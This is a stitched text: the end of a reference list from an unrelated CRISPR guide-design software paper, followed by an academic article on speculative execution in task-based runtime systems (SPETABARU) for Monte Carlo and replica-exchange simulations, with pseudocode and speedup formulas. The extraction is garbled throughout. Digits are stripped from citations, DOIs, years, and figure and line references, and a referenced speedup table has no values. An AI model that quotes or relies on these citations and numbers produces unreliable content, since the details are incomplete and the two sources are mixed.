gratz sj, ukken fp, rubinstein cd, thiede g, donohue lk, cummings am, o’connor-giles km. . highly specific and efficient crispr/cas -catalyzed homology-directed repair in drosophila. genetics : – doi . /genetics. . .
heigwer f, kerr g, boutros m. . e-crisp: fast crispr target site identification. nature methods : – doi . /nmeth. .
hsu pd, lander es, zhang f. . development and applications of crispr-cas for genome engineering. cell : – doi . /j.cell. . . .
jiang f, doudna ja. . the structural biology of crispr-cas systems. current opinion in structural biology : – doi . /j.sbi. . . .
kim s, kim d, cho sw, kim j, kim j-s. . highly efficient rna-guided genome editing in human cells via delivery of purified cas ribonucleoproteins. genome research : – doi . /gr. . .
lawrence m, huber w, pagès h, aboyoun p, carlson m, gentleman r, morgan mt, carey vj. . software for computing and annotating genomic ranges. plos computational biology :e doi . /journal.pcbi. .
liu h, wei z, dominguez a, li y, wang x, qi ls. . crispr-era: a comprehensive design tool for crispr-mediated gene editing, repression and activation. bioinformatics ( ): – doi . /bioinformatics/btv .
makarova k, grishin n, shabalina s, wolf y, koonin e. . a putative rna-interference-based immune system in prokaryotes: computational analysis of the predicted enzymatic machinery, functional analogies with eukaryotic rnai, and hypothetical mechanisms of action. biology direct : doi . / - - - .
mali p, esvelt km, church gm. . cas as a versatile tool for engineering biology. nature methods : – doi . /nmeth. .
mojica fjm, díez-villaseñor c, garcía-martínez j, almendros c. . short motif sequences determine the targets of the prokaryotic crispr defence system. microbiology : – doi . /mic. . - .
montague tg, cruz jm, gagnon ja, church gm, valen e. . chopchop: a crispr/cas and talen web tool for genome editing. nucleic acids research :w –w doi . /nar/gku .
naito y, hino k, bono h, ui-tei k. . crisprdirect: software for designing crispr/cas guide rna with reduced off-target sites. bioinformatics : – doi . /bioinformatics/btu .
r core team. . r: a language and environment for statistical computing. . . edition. r foundation for statistical computing.
ran fa, hsu pd, lin c-y, gootenberg js, konermann s, trevino ae, scott da, inoue a, matoba s, zhang y, zhang f. a. double nicking by rna-guided crispr cas for enhanced genome editing specificity. cell : – doi . /j.cell. . . .
ran fa, hsu pd, wright j, agarwala v, scott da, zhang f. b. genome engineering using the crispr-cas system. nature protocols : – doi . /nprot. . .
roberson e. . homo sapiens cuts per gene annotated for prime gg motif grnas—exhaustive scan. available at http://dx.doi.org/ . /m .figshare. .
shirley m, ma z, pedersen b, wheelan s. . efficient “pythonic” access to fasta files using pyfaidx. peerj preprints :e doi . /peerj. .
stemmer m, thumberger t, del sol keyer m, wittbrodt j, mateo jl. . cctop: an intuitive, flexible and reliable crispr/cas target prediction tool. plos one :e doi . /journal.pone. .
xiao a, cheng z, kong l, zhu z, lin s, gao g, zhang b. . casot: a genome-wide cas /grna off-target searching tool. bioinformatics : – doi . /bioinformatics/btt .
xie y. . dynamic documents with r and knitr. boca raton: chapman and hall/crc.
xie k, minkenberg b, yang y. . boosting crispr/cas multiplex editing capability with the endogenous trna-processing system. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. .
submitted december accepted february published march corresponding author bérenger bramas, berenger.bramas@inria.fr academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright bramas distributed under creative commons cc-by . open access increasing the degree of parallelism using speculative execution in task-based runtime systems bérenger bramas camus team, inria nancy—grand est, illkirch-graffenstaden, france abstract task-based programming models have demonstrated their efficiency in the development of scientific applications on modern high-performance platforms. they allow delegation of the management of parallelization to the runtime system (rs), which is in charge of the data coherency, the scheduling, and the assignment of the work to the computational units. however, some applications have a limited degree of parallelism such that no matter how efficient the rs implementation, they may not scale on modern multicore cpus. in this paper, we propose using speculation to unleash the parallelism when it is uncertain if some tasks will modify data, and we formalize a new methodology to enable speculative execution in a graph of tasks.
this description is partially implemented in our new c++ rs called spetabaru, which is capable of executing tasks in advance if some others are not certain to modify the data. we study the behavior of our approach to compute monte carlo and replica exchange monte carlo simulations. subjects distributed and parallel computing keywords stf, monte-carlo, speculation, task-based introduction parallel cpus are now everywhere, from mobile phones to high-performance computing nodes. to efficiently use this type of architecture, it is necessary to design applications to execute in parallel. this parallelization can be done in many ways with different paradigms. among them, the task-based approaches have demonstrated successful exploitation of the parallelism of an algorithm by simply using the real dependencies between the data. in turn, the division of the algorithm into tasks cannot use dependencies at a low level, such as the instruction level, because of the runtime and context management overheads but has to instead find the appropriate granularity to balance between the degree of parallelism and chunk of work. using task-based methods, it is possible to dissociate the parallelization algorithm from the rest of the code, composed of computational kernels and data structure definitions, but also from the hardware. this is intended to reduce issues coming from management of parallelization but also to avoid re-writing the application due to hardware changes. the complexity is then in the runtime system (rs), which is in charge of managing the execution, the distribution of the work, and the coherency. this also gives opportunities for specialists in scheduling or concurrent programming to improve these layers with a possible direct impact on the applications on the top. how to cite this article bramas b. . increasing the degree of parallelism using speculative execution in task-based runtime systems. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:berenger.bramas@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. on the other hand, the features and expressiveness of each rs can be different, and some very specific features could be needed for certain classes of algorithms. this was the starting point of our work while developing monte carlo (mc) and replica exchange monte carlo (remc) algorithms for protein simulations. the description using tasks and dependencies of these algorithms gives a low degree of parallelism. however, some write dependencies are actually not true because a task might ultimately not modify the data, but this cannot be known in advance. this motivated us to look to the side of speculative execution, with a primary objective of improving the scalability of the mc/remc algorithms. secondary objectives are to get a generic pattern/method to use speculation in task-based rs’s and to use only features that already exist in most task-based rs’s (tasks). the main contributions of our study are the following: • describe a general approach to include speculation in task-based rs’s. • detail a possible implementation of this new strategy. • introduce spetabaru, a new task-based rs capable of speculation. • illustrate how speculation can speed up mc and remc simulations. the current paper is organized as follows. 
in ‘motivation example: monte carlo simulations’, we describe the mc and remc simulations and discuss how they are usually parallelized as a motivation to our work. ‘background’ introduces the notions related to rs’s and speculative executions. ‘speculation in task-based runtime systems’ describes our new strategy and how it can be implemented in a regular task-based rs. finally, ‘performance study’ presents a performance study for executing mc and remc simulations with speculation. motivation example: monte carlo simulations the mc method is widely used in simulations of physical systems, especially when there are many coupled degrees of freedom that make traditional approaches inefficient or too expensive. among this large class of solvers, we focus on the monte carlo simulations that use the metropolis–hastings update. we refer to the studies in protein simulation (see thachuk, shmygelska & hoos, ; kim & hummer, ) to illustrate more precisely the type of problem we focus on. let us consider a system composed of multiple groups of beads/particles called domains. a domain can be a peptide in studies that focus on biomolecules in an all-atom approach. the energy of the system is a quadratic pair-wise computation between all particles in the system. a domain can move, that is, it can rotate, shift, or even redistribute its particles in space, which leads to a recomputation of the energy. the objective of such a problem generally is to find the configuration, meaning the position of the domains/beads, with the lowest energy. in the corresponding algorithm, a single stochastic process evaluates the energy of the system and accepts/rejects updates based on the temperature t. this t influences the probability for a change to be accepted, and with a high temperature the updates are more likely to be accepted. the mc simulation method is shown in algorithm . at line , the energy is computed for the default configuration. then, for a given number of iterations, bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the algorithm uses the domains and updates them (see line ). it continues by computing the new energy with this domain that moved at line . at line , we use the metropolis formula to decide, based on the energy difference and temperature, if the change has to be accepted. in case it is, we keep the change by replacing the old domain’s position with the new one (see line ). algorithm : monte carlo simulation algorithm. function mc(domains, temperature) // compute energy (particle to particle interactions) energy← compute_energy(domains) mc_core(domains, temperature, energy) function mc_core(domains, temperature, energy) // iterate for a given number of iterations for iter from to nb_loops_mc do for d in domains do // move a domain and compute new energy new_d←move(temperature, d) new_energy←update_energy(energy, new_d, domains) // accept the move (or do nothing) if random_ ()≤metropolis(new_energy, energy, temperature) then domains← replace(domains, d, new_d) energy←new_energy end end end replica exchange monte carlo simulation (remc) the mc algorithm might get trapped in local minimums or miss all local minimums, depending on t. the idea of the remc, also known as parallel tempering, is to run several mc simulations of the same system, but each with a different temperature. consequently, the acceptance rate and the speed of changes are very different for each of them. 
then, at defined iterations, the simulations are exchanged, again using the metropolis formula. therefore, simulations that run at high temperatures and where modifications were easily accepted will then run at a lower temperature. algorithm contains the different steps to be done with n different replicas/temper- atures. at line , we compute the energy for all randomly initialized systems. then, the algorithm iterates for a given number of times and first performs a call to the mc algorithm for each configuration, line . second is an exchange stage between configurations, starting at line . it is common that the exchange_list is designed such that the exchange happens between odd–even pairs of simulation when iter is odd and even–odd otherwise. parallelization of mc and remc the data dependencies for both the mc and remc algorithms are easy to extract. in the mc algorithm, each iteration depends on the previous one. the changes are only dependent over the domain, but to compute a new energy we have to know if the change of the previous domain has been accepted or not. consequently, the only parallelism that can be applied is inside the computation of the energy, possibly with a fork-join strategy. the same is true for the remc, with the difference that the calls to the n different mc simulations can be done in parallel. therefore, it is common to use one thread or one process per replica. in altekar et al. ( ), the authors proposed a point-to-point exchange bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : replica exchange monte carlo (parallel tempering) simulation algorithm. function remc(domains[n], temperature[n]) // compute energy (particle to particle interactions) for s from to n do energy[s]← compute_energy(domains[s]) end // iterate for a given number of iterations for iter from to nb_loops_remc do for s from to n do // compute usual mc for each simulation mc_core(domains[s], temperature[s], energy[s]) end // compare based on a given strategy for s in exchange_list(iter) do // use the energy difference between s and s+ to decide to exchange them if random_ ()≤metropolis(energy[s] - energy[s+ ], temperatures[s]) then swap(domains[s], domains[s+ ]) swap(energy[s], energy[s+ ]) end end end scheme. they distributed n replicas among p processes and ensured that there was no global barrier; in other words, only the processes that have to exchange simulations communicate. the same principle applies in zhou et al. ( ) with one process per temperature/replica. similarly, in gross, janke & bachmann ( ), the authors dedicated one thread or one gpu per replica. finally, in treikalis et al. ( ), the authors proposed a parallel framework for plugging in mc-based applications. they also remind that asynchronous re (so without a global barrier) is needed in many cases. however, no matter how efficient the implementation, synchronizations between the domains in the mc and the replicas in the remc must be done. but it appears clear that these dependencies are sometimes not needed when the changes are rejected because the data are left unchanged, so it could be possible to compute in advance, hoping that the result will not be invalid. the main part of the current study is to provide a system for this compute-in-advance on top of an rs. background task-based parallelization most hpc applications that support shared-memory parallelization rely on a fork-join strategy. 
such a scheme uses a simple division of the work into independent operations and a global barrier that ensures all the work is done before the execution continues. the most common feature is the for-loop parallelization using pragmas as proposed by the openmp (openmp architecture review board, ) standard. this model has been extended to a tasks-and-wait scheme, where operations come from different parts of the application but are still independent. the task model from openmp (openmp architecture review board, ; ayguadé et al., ) and the task-based programming language cilk (blumofe et al., ) (later extended in cilk++ (leiserson, ) and cilk plus (intel, )) follow this idea. this is still a fork-join model because successive spawn phases of independent tasks (fork) must be explicitely synchronized (join) to ensure a bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. correct execution. this really limits the scalability because of the waiting time and the imbalance between tasks. developers are able to increase the degree of parallelism by using multiple sources of tasks that they known are independent. but then it starts to become manual management of the dependencies, which a modern task-based rs is intended to do. an algorithm can be decomposed in interdependent operations where the output of some tasks is the input of others. a task-based implementation will map tasks over these operations and create dependencies between them to ensure execution coherency. the result can be seen as a direct acyclic graph (dag) of tasks, or simple graph of tasks, where each node is a task and each edge is a dependency. an execution of such a graph will start from the nodes that have no predecessor and continue inside the graph, ensuring that when a task starts, all its predecessors have completed. the granularity of the tasks, that is, the content in terms of computation, cannot be too fine-grained because the internal management of the graph implies an overhead that must be negligible to ensure good performance, as shown in tagliavini, cesarini & marongiu ( ). therefore, it is usually the developer’s responsibility to decide what a task should represent. the granularity is then a balance between the degree of parallelism and the rs overhead. for that reason, several researches are conducted to delegate partially or totally the rs system to the hardware with the objective of relieving the worker threads, as in chronaki et al. ( ). building a graph of tasks can be done in two major ways. the first possibility is to build a graph by creating the nodes and connections between them explicitly, as it is used in the parametrized task graph (ptg) model (cosnard & loi, ). this approach is complex and usually requires completely rewriting an application. the second method is the sequential task flow (stf) (agullo et al., b). here, a single thread creates the tasks by informing the rs about the access of each of them on the data. the rs is then able to generate the graph and guarantee that the parallel execution will have the absolute same result as a sequential one. this ends in a very compact code with few modifications required to add to an existing application by moving the complexity in the rs. in our work, we use the stf model. there now exist numerous different task-based rs’s. 
the most popular ones are implementations of the openmp version (openmp architecture review board, ) standard that defines the additional pragma keyword depend to inform the rs about the type of data accesses performed by the tasks. however, using pragmas, in general, is tedious when a task has hundreds of dependencies or when the number of dependencies are known at runtime, because it ends up being an ugly and error-prone code. in addition, as openmp is a standard, it is upgraded slowly to ensure backward compatibility. moreover, the standard is weak in the sense that it does not impose any constraints on the implementation and complexity of the underlying algorithms. this can cause performance surprises for the user when compared to different openmp rs’s. nonetheless, its portability, stability, and maturity make it a safe long-term choice. additionally, some industrial rs’s have been defined, such as the intel threading building blocks (itbb), c++ library (intel, b). it allows building of graphs using the ptg model, but it also supports various other features such as memory allocation management and parallel containers. parsec (danalis et al., ) is another rs based on bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the ptf model that had been demonstrated to be effective in various scientific applications. charm++ (kale & krishnan, ) is a c++-based parallel programming system. it includes the parallelism by design with a migratable-objects programming model, and it supports task-based execution. smpss (perez, badia & labarta, ), now included in ompss (duran et al., ), is a rs based on the stf model that defined what later became the openmp tasks. it uses pragmas annotation to inform the rs about data access by the tasks. starpu (augonnet et al., ) is an rs that was first designed to manage heterogeneous architectures. it is a c library such that the user has to use low-level programming and function pointers. however, it is extremely flexible and it is capable of having distributed memory stf. xkaapi (gautier et al., ) is an rs that can be used with standard c++ or with specific annotation but which needs a given compiler. legion (bauer et al., ) is a data-centric programming language that allows for parallelization with a task-based approach. superglue (tillenius, ) is lightweight c++ task-based rs. it manages the dependencies between tasks using a data version pattern. most of these tools support a core part of task-based rs, such as creating a graph of tasks (even if it is implemented differently) where tasks can read or write data. however, scheduling is an important factor in the performance (agullo et al., a), and few of these rs’s propose a way to create a scheduler easily without having to go inside the rs’s code. moreover, specific features provide mechanisms to increase the degree of parallelism. for instance, some rs’s allow specification of whether data access is commutative, meaning that the tasks write data but the order is not important. this kind of advanced functions can make a big difference in terms of performance (agullo et al., ). we refer to thoman et al. ( ) for a more in-depth comparison of the rs’s. to the best of our knowledge, none of them propose a speculation system. but any of the stf based rs could easily implement our strategy to use speculation. speculative execution speculation is the principle of guessing without being certain in order to make a profit. 
it is commonly used at the instruction level in cpu hardware to fill the pipeline of instruction when there is a branch, to prefetch the memory, to manage the memory dependence, and to use transactional memory. in our system, the speculation is at the application level, or more precisely, at the task level. therefore, it has very different constraints, advantages, and disadvantages compared to hardware-based speculation. on the other hand, it requires managing copies and synchronizations at a high level, too. the two main speculation strategies are called eager and predictive. eager execution computes all paths, and this is usually not realistic because there are too many of them and because the real path may actually be found only once the results are known. predictive execution is the more common strategy; in this model, the execution follows a path until we know if the prediction is true. a common speculation pattern is called thread level speculation (tls). in steffan & mowry ( ), the authors describe how tls was expected to improve parallel performance of non-numeric applications. the idea is to mimic the instruction speculation by the compiler by, for example, reordering instruction to move a load ahead of a store. at bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure graph of four tasks where b is task that will potentially modify the data. full-size doi: . /peerjcs. /fig- execution time, if the speculation appears unsafe, a recovery method should be used. tls is somewhat similar, but the load and store are performed by two different threads. a speculation is then safe if the execution of a load does not target a location that will be modified by a store, which should have already been done. the main problems are to provide a system to control the safety at low costs and how the compiler can automatically insert speculative code. consequently, many researchers have defined new hardware that would make the tls or a similar pattern possible, such as in jeffrey et al. ( ). but many of these research projects are tied to the manufacturer’s choices. in salamanca, amaral & araujo ( ), the authors discuss how instructions that currently exist in most cpus to manage transactional memory (tm) could be used to implement tls. they show that tls is already possible but that false-sharing, coming from the size of the element the tm instructions are working on, can significantly decrease the performance. other speculation methods have been proposed with pure software approaches. for example, the apollo (apollo, ) framework is capable of speculative parallelization processes for loops of any kind (for, while, or do-while loops). it is composed of two main layers. first, an extensions to the clang-llvm compiler prepares the program by generating several versions of each target loop nest and several code snippets called code bones (martinez caamaño et al., ). during the execution, the rs orchestrates the execution of the different code versions by chunks. our approach is different; because it is high level and not designed for a few instructions, it does not require special hardware instruction, and it is designed for applications that are already parallel at the top of a graph of tasks. speculation in task-based runtime systems description consider a simple graph of tasks as shown in fig. where four tasks access the same data. 
here, task b may or may not write data, but to ensure a correct execution, we must use write data access, and so the dependency between b and c is strict. in our approach, we allow the programmer to indicate that a task will potentially write data, that is, there is a condition in the task that will make the modification effective or not. then, at the end of the task’s execution, the task informs the rs whether or not the data was actually modified. in doing this, the rs knows that speculation is possible, and it can create extra tasks as shown in fig. . when an uncertain task (a task with at least one potential write) is inserted, the rs creates a copy-task in front of it, a speculative task, and a select task. at runtime, if the speculation is enabled, the rs has to manage them to ensure accuracy and coherency.
figure graph of four tasks where b is an uncertain task. extra tasks are created by the rs: copy, c’ and select.
figure graph of four tasks where b is an uncertain task and with speculation enabled. when b is over, the rs updates the next tasks: (a) if b wrote on the data, the rs tries to cancel c’, enables c and disables the select; (b) if b did not write on the data, the rs disables c and enables the select.
in our example, when the speculation is enabled, both b and c’ can be computed concurrently. then, there are two possibilities: either b modified the data or it did not. if it did, as shown in fig. a, then the result of c’ is invalid and will be destroyed. in addition, the valid result from b used by c will have to be computed, and we can disable the select task. otherwise, as shown in fig. b, in the case where b did not write data, the output of c’ is valid. c is disabled, and the select task is enabled to ensure that the valid result is used as output of this group of tasks. in terms of execution time, without speculation, we have the total duration d = d(b) + d(c). with speculation and if b writes data, then d = d(copy) + max(d(b) + d(c), d(c’)), considering that c’ is computed at the same time as b and c, and where d(c’) is zero if canceled. with speculation and if b does not write data, then d = d(copy) + max(d(b), d(c’)) + d(select). the creation of the extra tasks can be done at the time of insertion, and thus, it does not require any specific feature from the rs. however, it implies a possible overhead since the creation of a task usually requires multiple allocations and possible synchronizations in the scheduler. the enabling and disabling of the tasks during execution do not mean that the task has to be removed from the dag, but that their core part should act as an empty function. the select tasks are functions that act as a switch and decide which data are the valid output. for instance, in the given example, if x is the original value accessed by the tasks and x’ the copy of x accessed by c’, the select code would be x = x’. therefore, we only have to enable the select task when we want to overwrite x by the output of c’.
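to make the pattern concrete, here is a deliberately simplified, runtime-agnostic sketch in python (spetabaru itself is a c++ library, and none of the names below come from its api): the uncertain task reports whether it wrote its data, and the select step is enabled only when the speculative duplicate’s output is the valid one.

```python
# Toy illustration (not SPETABARU's API) of the copy / speculative-duplicate /
# select pattern for one uncertain task B followed by a task C.
import copy as _copy

def run_speculative_pair(data, uncertain_b, task_c):
    """uncertain_b(data) -> bool (True if it modified data in place);
    task_c(data) -> None. Returns the data object that is valid afterwards."""
    snapshot = _copy.deepcopy(data)    # the 'copy' task, taken before B runs
    # In a real RS, B and the duplicate C' run concurrently on different workers;
    # here both are executed and then resolved, to keep the decision logic visible.
    b_wrote = uncertain_b(data)        # uncertain task B, works on the original data
    task_c(snapshot)                   # speculative duplicate C', works on the copy
    if b_wrote:
        # Speculation failed: discard C''s result and run the real C after B.
        task_c(data)
        return data                    # the 'select' task stays disabled
    # Speculation succeeded: the 'select' task makes C''s output the valid one.
    return snapshot
```

a real rs would of course also try to cancel the duplicate when the speculation fails; the sketch only keeps the accept/reject decision that drives the select task.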
figure graph of five tasks where b is an uncertain task and where c, the task used for speculation, uses data from another task e. (a) normal dag; (b) if c uses the data from e in write, an extra copy and select are needed; (c) if c uses the data from e in read, nothing special is needed.
figure graph of six tasks where b and f are non-consecutive uncertain tasks. (a) original dag; (b) dag if c writes on both data used by b and f.
figure graph of six tasks where b is an uncertain task. (a) original dag; (b) graph when both c and e write on the data potentially used in b; (c) graph when both c and e read the data potentially used in b.
the decision to activate the speculation can be done at runtime, and the extra tasks should simply be disabled if the speculation should not happen.
multiple dependencies
more advanced examples are shown in figs. , , and . they show how the rs should act to speculate but still have a valid and coherent execution. in fig. , task c uses data from a normal task e in addition to that from the uncertain task b. therefore, if c writes data from e, c’ does so as well. since we do not know if c’ will be valid, we have to insert an extra copy, as shown in fig. b. an additional select is also needed to select the correct data from c or c’ as the output of the task group. otherwise, if the data from e is used in reading by c, then both c and c’ can use the same data concurrently, as shown in fig. c.
speculative task group (stg)
in fig. , we provide an example where we have more than one uncertain task, but not consecutively. in this case, we need to copy all data that could be modified by the uncertain tasks b and f, and we need one select for each of them. however, there is a very important aspect here because b and f might not have the same behavior, and as a result, one could write the data while the other does not. therefore, in our approach, we link together all the tasks that are connected inside an stg. if at least one uncertain task of the group modifies the data, then the speculation has failed no matter the result of the other uncertain tasks. it could be more fine-grained, but that would require a complex algorithm to ensure coherent progression in the dag. in the given example, if b or f modifies the data, then the rs tries to cancel c’, enable c, and disable the selects. an stg also links the tasks used for speculation. as an example, in fig. , the uncertain task b may or may not write data at two different points. one of the two is later used by c, and the other one is later used by e. here, we consider only two cases: when c and e write the data (fig. b) and when they use those data in read (fig. c). in the first case, when b fails, the rs tries to cancel c’ and e’, enable c and e, and disable the selects, while in the second case, there is no need to have a select. in our case, an stg is composed of several lists: the list of copy tasks, the list of uncertain tasks, the list of original speculative tasks, the list of speculative tasks, and the list of selects.
At runtime, based on the results, these lists have to be properly managed to ensure a correct execution. The decision to enable the speculation in a task group can be made when the first copy task is ready. Since all of this information is constructed at task insertion time, there is also a need to merge different task groups, which is simply a merge of the lists, or an extra list that references the other groups.

Multiple consecutive uncertain tasks

It can happen that several uncertain tasks are consecutive (directly connected in the graph). There are several ways of managing such a configuration, and the figure below shows four of them. In alternative (a), we leave everything unchanged compared to the previous examples, but then it appears that D could speculate over C. In alternative (b), we perform the speculation above all the uncertain tasks; here, the consecutive uncertain tasks compute one after the other, but the degree of parallelism remains two no matter the number of uncertain tasks. In alternative (c), we mix the speculation above B and C; here, the degree of parallelism is three, because C', C, and D' can be computed concurrently, but again, if there are more than three uncertain tasks, the degree remains the same. Finally, what we use is shown in alternative (d). Here, (B,C), C', and D' can be computed concurrently, and the degree of parallelism increases with the number of uncertain tasks.

Figure: Graph of four tasks where B and C are tasks that will potentially modify the data. (a) Alternative 1: no speculation is done on C. (b) Alternative 2: task D speculates above B and C. (c) Alternative 3: speculation is used successively on each uncertain task. (d) Alternative 4: multiple speculation paths are used.

Speedup for one or multiple consecutive uncertain tasks

The expected speedup is, of course, a matter of probability, depending on the success rate of the speculation. For instance, consider n consecutive uncertain tasks followed by a normal task, all of the same cost t, with negligible copies/selects and at least n available workers. The speedup will be, on average,

    S = \frac{(n+1)\,t}{(n+1)\,t - d_n},
    \qquad
    d_n = \sum_{i=1}^{n} t \cdot i \cdot p_{i+1} \prod_{j=1}^{i} (1 - p_j),
    \qquad
    p_{n+1} = 1,

where d_n is the average duration gain and p_i is the probability that the task of index i writes its data. In the expression for d_n, we sum the average gain over the cases where a given task is the first one to write: when task i+1 writes data but all its predecessor tasks do not, we obtain an average gain of i × t with probability p_{i+1} \prod_{j=1}^{i} (1 - p_j). The probability p_{n+1} is set to 1 because, by definition, the (n+1)-th task is a normal task that always writes the data. If the probability is 1/2 for all uncertain tasks, then we have

    d_{1/2} = t \left( \sum_{i=1}^{n-1} \frac{i}{2^{i+1}} + \frac{n}{2^{n}} \right).

We provide the speedup in the accompanying table, considering an execution of unit cost (t = 1) with n uncertain tasks followed by one normal task.

Table: Gain in time d (as a percentage of one task) and speedup for different probabilities of invalid speculation and different numbers of uncertain tasks n.
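As a small numerical sketch (not part of the paper's artifacts), the following self-contained C++ program evaluates the average gain d_n and the resulting speedup from the formulas above for given per-task write probabilities:

    #include <iostream>
    #include <vector>

    // Average gain d_n for n consecutive uncertain tasks of unit cost t,
    // given p[i-1] = probability that uncertain task i writes its data.
    double averageGain(const std::vector<double>& p, double t) {
        const int n = static_cast<int>(p.size());
        double gain = 0.0;
        for (int i = 1; i <= n; ++i) {
            // Probability that task i+1 writes while tasks 1..i do not
            double prod = (i < n) ? p[i] : 1.0;   // p_{n+1} = 1 (normal task)
            for (int j = 1; j <= i; ++j) prod *= (1.0 - p[j - 1]);
            gain += t * i * prod;
        }
        return gain;
    }

    int main() {
        const double t = 1.0;
        std::vector<double> p(4, 0.5);            // n = 4 uncertain tasks, all with probability 1/2
        const double n = static_cast<double>(p.size());
        const double dn = averageGain(p, t);
        const double speedup = (n + 1.0) * t / ((n + 1.0) * t - dn);
        std::cout << "d_n = " << dn << ", speedup = " << speedup << "\n";
        return 0;
    }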
Multiple consecutive uncertain tasks (eager extension)

Our objective, which is not yet implemented in our RS, is presented in the figure below. Here, we create all the tasks necessary to restart the speculation process when it fails. However, this requires the creation of (n² + n)/2 − n speculative tasks, with n being the number of consecutive uncertain tasks, plus the copy and select tasks. Many of these tasks are disabled by default and enabled only when a speculation fails. In terms of performance, any non-modification of the result then provides a benefit of t. Therefore, the average duration gain f(n) is given by

    f(n) = f(n-1)\,p_n + \big(f(n-1) + t\big)(1 - p_n) = f(n-1) + t\,(1 - p_n),
    \qquad
    f(0) = 0,

where p_i is the probability that the task of index i writes its data. In the recursion, we compute f(n) by summing, first, the gain when task n writes data, which happens with probability p_n, and, second, the gain when task n does not write data, which happens with probability 1 − p_n. The recursion can be rewritten in closed form as

    f(n) = t \sum_{i=1}^{n} (1 - p_i).

Figure: Graph of four tasks where B and C are uncertain tasks. Extra tasks are created by the RS: C', D', D'', and several copies/selects.

Another way to describe this formula is to consider that, if we have n uncertain tasks, we first compute task 1 and speculate over it with duplicates of tasks 2 to n. If task i writes data, then we have to compute task i+1 and speculate over it with duplicates of tasks i+2 to n. We do so until no task writes data or the n-th task has been computed. The average speedup is then given by

    S = \frac{(n+1)\,t}{(n+1)\,t - f(n)}.

For a probability of 1/2 for all uncertain tasks, the average speedup therefore approaches 2, regardless of the number of consecutive speculative tasks.
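As a quick sanity check derived from the closed form above (not an additional result of the paper), take all p_i = 1/2:

    f(n) = t \sum_{i=1}^{n}\left(1 - \tfrac{1}{2}\right) = \frac{n\,t}{2},
    \qquad
    S = \frac{(n+1)\,t}{(n+1)\,t - n\,t/2} = \frac{2(n+1)}{n+2} \;\longrightarrow\; 2 \quad (n \to \infty).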
Changing the DAG on the fly

From the execution shown earlier (the four-task example with speculation enabled), one can ask whether the behavior could be different when C' finishes before B. It would be interesting to speculate for D too, by creating a task D' and the corresponding copy and select. However, we decided not to do so because it requires modifying the DAG on the fly, which is a difficult operation to implement and one that most RSs do not support.

Algorithm 1: Uncertain task insertion.
    function insert_uncertain_task(t)
        // Clean the duplicate data handles if one is used in read mode and is used by t not in read mode
        global_duplicates.clean_if_in_read(t.data in read)
        // Find the spec-groups related to t
        groups ← global_duplicates.find_spec_groups(t.data)
        if one of them is disabled or groups is empty then
            // Remove the duplicates related to t (not the one just inserted)
            global_duplicates.remove_any_kind(t.data)
            // Duplicate the data used by t in maybe-write (list l1)
            l1 ← create_duplicate(t.data in maybe-write)
            // Insert t without speculation
            internal_insert(t)
            // Add l1 to the global list
            global_duplicates.append(l1)
            // Create a new group
            g ← create_group_with_no_parent()
            g.set_main_task(t)
        else
            // Duplicate the data used by t in maybe-write (list l1)
            l1 ← create_duplicate(t.data in maybe-write)
            // Create a new group with groups as parents
            g ← create_group_with_parents(groups)
            g.add_copy_tasks(l1.copy_tasks)
            // Duplicate the data used by t in maybe-write that are already duplicated (list lp) (inform g)
            lp ← create_duplicate(t.data in maybe-write and existing in global_duplicates)
            g.add_copy_tasks(lp.copy_tasks)
            // Duplicate the data used by t in write that are not already duplicated (list l2) (inform g)
            l2 ← create_duplicate(t.data in write and not existing in global_duplicates)
            g.add_copy_tasks(l2.copy_tasks)
            // Insert t as a normal task (inform g)
            g.set_main_task(t)
            internal_insert(t)
            // Insert t as a speculative task using the duplicates l1 and l2 and the global list (inform g)
            internal_speculative_insert(t, l1, l2)
            // Add the select tasks and clean the duplicates (inform g)
            select_tasks ← create_select_tasks()
            g.add_select_tasks(select_tasks)
            // Add lp to the global list
            global_duplicates.append(lp)
        end if

Algorithm 2: Normal task insertion.
    function insert_normal_task(t)
        // Clean the duplicate data handles if one is used in read mode and is used by t not in read mode
        global_duplicates.clean_if_in_read(t.data in read)
        if no data used by t has been duplicated then
            // Simply insert t, there is no speculation to do
            internal_insert(t)
        else
            // Find the spec-groups related to t
            groups ← global_duplicates.find_spec_groups(t.data)
            if one of them is disabled then
                // We already know that the speculation has failed
                // Remove the duplicates related to t
                global_duplicates.remove_any_kind(t.data)
                // Insert t without speculation
                internal_insert(t)
            else
                // Build a new group with groups as parents
                g ← create_group_with_parents(groups)
                // Duplicate the data used by t in write mode that are not already duplicated (list l1) (inform g)
                l1 ← create_duplicate(t.data in write and not existing in global_duplicates)
                // Insert t as a normal task (inform g)
                g.set_main_task(t)
                internal_insert(t)
                // Insert t as a speculative task using the duplicates l1 (inform g)
                internal_speculative_insert(t, l1)
                // Add the select tasks (using l1) and clean the duplicates (inform g)
                select_tasks ← create_select_tasks()
                g.add_select_tasks(select_tasks)
            end if
        end if

Algorithms

Speculative task group

The STG contains the lists of tasks that are all connected to the same uncertain tasks' results. It has a state, which can be undefined, enabled, or disabled, and a result that indicates whether one of the uncertain tasks did write its data. An STG also has a list of predecessor STGs and a list of successor STGs.
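A hypothetical C++ sketch of this bookkeeping could look as follows; the type and field names are illustrative and are not the actual SPETABARU types:

    #include <vector>

    struct Task;  // opaque task handle provided by the runtime system

    enum class SpecState { Undefined, Enabled, Disabled };

    struct SpeculativeTaskGroup {
        SpecState state = SpecState::Undefined;
        bool anUncertainTaskWrote = false;            // result: did any uncertain task write its data?
        std::vector<Task*> copyTasks;
        std::vector<Task*> uncertainTasks;
        std::vector<Task*> originalSpeculativeTasks;  // the normal versions (e.g., C)
        std::vector<Task*> speculativeTasks;          // the duplicates (e.g., C')
        std::vector<Task*> selectTasks;
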